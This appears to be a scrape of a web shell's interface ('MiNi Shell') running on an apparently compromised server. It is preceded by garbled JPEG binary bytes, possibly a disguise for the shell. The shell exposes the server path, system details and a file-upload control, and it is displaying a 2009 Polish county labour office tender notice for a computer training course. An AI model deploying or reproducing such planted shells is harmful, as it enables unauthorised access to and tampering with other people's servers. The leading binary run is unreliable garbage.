JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090525/164560-N-2009.html

<p class="kh_header"><b>Drawsko Pomorskie: Przedmiotem zamówienia jest organizacja i przeprowadzenie usługi szkolenia o nazwie : Kurs komputerowy</b><br>
<b>Numer ogłoszenia: 164560 - 2009; data zamieszczenia: 25.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Drawsku Pomorskim , ul. Starogrodzka 9, 78-500 Drawsko Pomorskie, woj. zachodniopomorskie, tel. 0-94 3632519, faks 0-94 3632734.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupdrawsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie usługi szkolenia o nazwie : Kurs komputerowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie usługi szkolenia o nazwie : Kurs komputerowy, Ilość miejsc - dla 12 osób bezrobotnych. Termin i warunki realizacji szkolenia : Rozpoczęcie szkolenia: nie później niż od 22.06.2009r. Miejsce realizacji szkolenia:  miasto Drawsko Pom. Zajęcia mają odbywać się 5 dni w tygodniu ( od poniedziałku do piątku) nie krócej niż 6 godzin i nie dłużej niż 8 godzin zegarowych dziennie i nie mogą kończyć się później niż o godzinie 16. Za godzinę zegarową szkolenia należy uznać 60 minut, które obejmują zajęcia edukacyjne liczące 45 minut oraz przerwę 15 minut (długość przerw może być ustalona w sposób elastyczny).W przypadku wystąpienia w dniach od poniedziałku do piątku (święta) dopuszcza się organizację zajęć zamiennie w sobotę. Liczba godzin szkoleniowych: 150 godzin zegarowych. Wykonawca winien zapewnić materiały dydaktyczne dla każdego uczestnika szkolenia. Konieczność zapewnienia warunków szkolenia zgodnie z przepisami BHP. Zapewnienie 12 stanowisk komputerowych. Zapewnienie przerw kawowych dla uczestników szkolenia (ciastka, kawa, herbata, cukier, zimne napoje). Zakres szkolenia  winien zawierać elementy standardów kwalifikacji zawodowych i modułowych programów szkoleń dostępnych w bazach danych Ministerstwa Pracy i Polityki Społecznej znajdujących się na stronie www.standardyiszkolenia.praca.gov.pl. Szkolenie powinno zakończyć się uzyskaniem następujących dokumentów : zaświadczenia o jego ukończeniu zgodne z rozporządzeniem MEN z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31 poz. 216 z 2006r.). Wszystkie zaświadczenia absolwentów szkolenia muszą być opatrzone logo Programu Operacyjnego Kapitał Ludzki  oraz Unii Europejskiej i zawierać informację o współfinansowaniu projektu. W przypadku braku możliwości dokonania nadruku na ww. zaświadczeniach wykonawca zobowiązany jest do wydania dodatkowych zaświadczeń, dyplomów lub certyfikatów oznaczonych ww.  logo..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.51.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:
W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.Spełnią warunki określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych i nie wykluczeni z postępowania o udzielenie zmówienia publicznego na podstawie art. 24 ust.1 i 2 ww. ustawy ( wykonawca winien złożyć podpisane przez uprawnionego przedstawiciela wykonawcy oświadczenie o spełnieniu warunków udziału w postępowaniu na podstawie art. 44 tj. spełniający warunki określone  w art. 22 ust. 1 ustawy Prawo zamówień publicznych i nie wykluczony z postępowania  o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 i 2 ww. ustawy - załącznik nr 1 do SIWZ).
2. Złożą ofertę nie podlegającą odrzuceniu na druku Oferta Instytucji Szkoleniowej( Wykonawca winien złożyć ofertę na druku stanowiącym załącznik nr 2 do SIWZ).
3. Złożą szczegółowy program szkolenia na druku Program szkolenia ( Wykonawca winien złożyć program szkolenia na druku stanowiącym załącznik nr 3 do SIWZ).
4. Posiadają wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej - art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy ( Dz. U. Nr 69 poz. 415 z 2008r. z późn. zm. ), Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych ( Dz. U. Nr 236, poz. 2365 z 2004r. ) - wykonawca winien złożyć aktualny wpis lub wydruk z rejestru instytucji szkoleniowych o kontynuacji działalności szkoleniowej w 2009r.
5. Posiadają kadrę dydaktyczną o kwalifikacjach i doświadczeniu w realizacji szkoleń będących przedmiotem zamówienia - wykonawca winien dołączyć: 
a)  CV kadry dydaktycznej ( odrębnie dla każdego wykładowcy), z których musi wynikać, iż posiadają oni kwalifikacje i doświadczenie zawodowe potwierdzające sprawność i zdolność do wykonania przedmiotu zamówienia (kserokopie dyplomów, zaświadczeń z ukończonych kursów i szkoleń ) oraz oryginalne i  czytelne (imię i  nazwisko) podpisane oświadczenia wykładowców o woli współpracy  i dyspozycyjności w okresie realizacji szkolenia.
6. Wykorzystają w programie szkolenia elementy standardów kwalifikacji zawodowych  i modułowych programów szkolenia jeżeli znajdują się one w bazie danych prowadzonych przez Ministra Pracy i Polityki Społecznej  -  www.standardyiszkolenia.praca.gov.pl (Wykonawca winien dołączyć oświadczenie, które stanowi załącznik nr 5 do SIWZ).
7. Będą prowadzili nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia (wykonawca winien opisać w ofercie szkoleniowej stanowiącej załącznik nr 2 do SIWZ, zastosowane w trakcie trwania kursu, metody prowadzenia nadzoru wewnętrznego oraz wskazać osobę, która będzie do dyspozycji grupy w trakcie szkolenia i będzie odpowiadała za organizację i sprawny przebieg szkolenia).
8. Dokonają sprawdzenia efektów szkolenia (Wykonawca w ofercie szkoleniowej stanowiącej załącznik nr 2  do SIWZ, opisze sposób sprawdzenia uzyskanej wiedzy przez uczestników szkolenia).
9. Potwierdzą ukończenie szkolenia i uzyskanie kwalifikacji przez osoby bezrobotne na formularzu zaświadczenia zgodnym z wzorem określonym w załączniku nr 1 do Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania  i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ( wykonawca winien przedstawić wzór zaświadczenia, które otrzymają uczestnicy szkolenia po jego zakończeniu). 
10. Zaangażują  się  w pozyskanie miejsc pracy dla przeszkolonych osób ( Wykonawca w  ofercie szkoleniowej stanowiącej załącznik nr 2 SIWZ, opisze w jaki sposób zaangażuje się w pozyskanie ewentualnych  miejsc pracy ).
11. Złożą oświadczenie o braku zaległości podatkowych oraz z tytułu składek na ubezpieczenie społeczne i zdrowotne.
12. Złożą aktualny odpis z właściwego rejestru sądowego  lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert. Osoby reprezentujące wykonawcę i nie wymienione w KRS lub wpisie do ewidencji działalności  gospodarczej powinny przedstawić dokumenty  potwierdzające ich umocowanie .
13. Złożą oświadczenie o akceptacji warunków umowy ( załącznik nr 4 do SIWZ).
14. Dołączą certyfikat jakości usług i lub akredytację kuratora oświaty lub inne certyfikaty świadczące o jakości usług i rzetelności wykonawcy (jeśli Wykonawca posiada)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, których oferta odpowiada zasadom określonym w ustawie z dnia 29.01.2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223 poz. 1655 z póź. zm.). Dla potwierdzenia spełnienia ww. warunków udziału w postępowaniu Wykonawcy winni przedstawić niżej wymienione dokumenty:
1. Podpisane przez uprawnionego  przedstawiciela Wykonawcy oświadczenie o spełnianiu warunków udziału w postępowaniu na  postawie  art. 44 tj. spełniający warunki określone w art. 22 ust. 1 ustawy  z dnia 29.01.2004r. Prawo zamówień publicznych i nie wykluczeni z postępowania o udzielenie zamówienia publicznego na  podstawie art. 24 ust. 1 i 2 ww. ustawy (załącznik nr 1 do SIWZ)
2. Wypełniony formularz oferty na druku Oferta Instytucji Szkoleniowej ( według wzoru załącznika nr 2 do SIWZ).
3. Wypełniony formularz Program szkolenia ( według wzoru załącznika nr 3 do SIWZ).
4. Zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  - art. 20 ust.1 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy ( Dz. U. Nr 69 poz.415 z 2008r.z póź. zm.), Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236 poz. 2365 z 2004r.) -  należy dołączyć aktualny wpis lub wydruk z rejestru instytucji szkoleniowej o kontynuacji działalności szkoleniowej w 2009r.
5. CV kadry dydaktycznej ( odrębnie dla każdego wykładowcy),  z których musi wynikać, iż posiadają oni kwalifikacje i doświadczenie zawodowe potwierdzające sprawność i zdolność do wykonania przedmiotu zamówienia (kserokopie dyplomów, zaświadczeń z ukończonych kursów i szkoleń ) oraz oryginalne i  czytelne (imię i  nazwisko) podpisane oświadczenia wykładowców o woli współpracy  i dyspozycyjności w okresie realizacji szkolenia.
6. W celu potwierdzenia, że w programie szkolenia wykorzystano standardy kwalifikacji zawodowych i modułowych programów szkolenia znajdujących się w bazie danych prowadzonych przez Ministra Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl -  Wykonawca winien dołączyć oświadczenie, które stanowi załącznik nr 5 do SIWZ.
7. Wzór zaświadczenia, które otrzymają uczestnicy szkolenia po jego zakończeniu. 
8. Pisemne oświadczenie Wykonawcy o przyjęciu całości warunków umowy (wg formularza stanowiącego załącznik nr 4 do SIWZ).
9.Certyfikat jakości usług i/lub akredytację kuratora oświaty  lub inne certyfikaty świadczące o jakości usług i rzetelności wykonawcy (jeśli posiada).
10. Wykaz szkoleń zorganizowanych w okresie ostatnich 36 miesięcy przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom - stanowiącym przedmiot zamówienia, z podaniem dat wykonania oraz liczby osób objętych szkoleniem (  wg wzoru stanowiącego załącznik nr 6 do SIWZ). W załączeniu należy przedstawić dokumenty potwierdzające należyte wykonanie zamówienia ( np. referencje, podziękowania, pochwały itp.) 
11. Oświadczenie o braku zaległości podatkowych oraz z tytułu składek na ubezpieczenie społeczne i zdrowotne.
12. Aktualny odpis z właściwego rejestru sądowego  albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Osoby reprezentujące wykonawcę i nie wymienione w KRS lub wpisie do ewidencji działalności  gospodarczej powinny przedstawić dokumenty  potwierdzające ich umocowanie.
13. Zaświadczenia o numerze identyfikacji REGON oraz decyzję o nadaniu NIP..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy - 20</li>
<li>3 - Posidane przez Wykonawcę certyfikaty - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pupdrawsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Drawsku Pom.
ul. Starogrodzka 9
78-500 Drawsko Pom.
pokój nr 13
tel (094) 36-325-19 faks (094) 36-327-34.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Drawsku Pom.
ul. Starogrodzka 9, 78-500 Drawsko Pom.
pokój nr 8 -  Sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com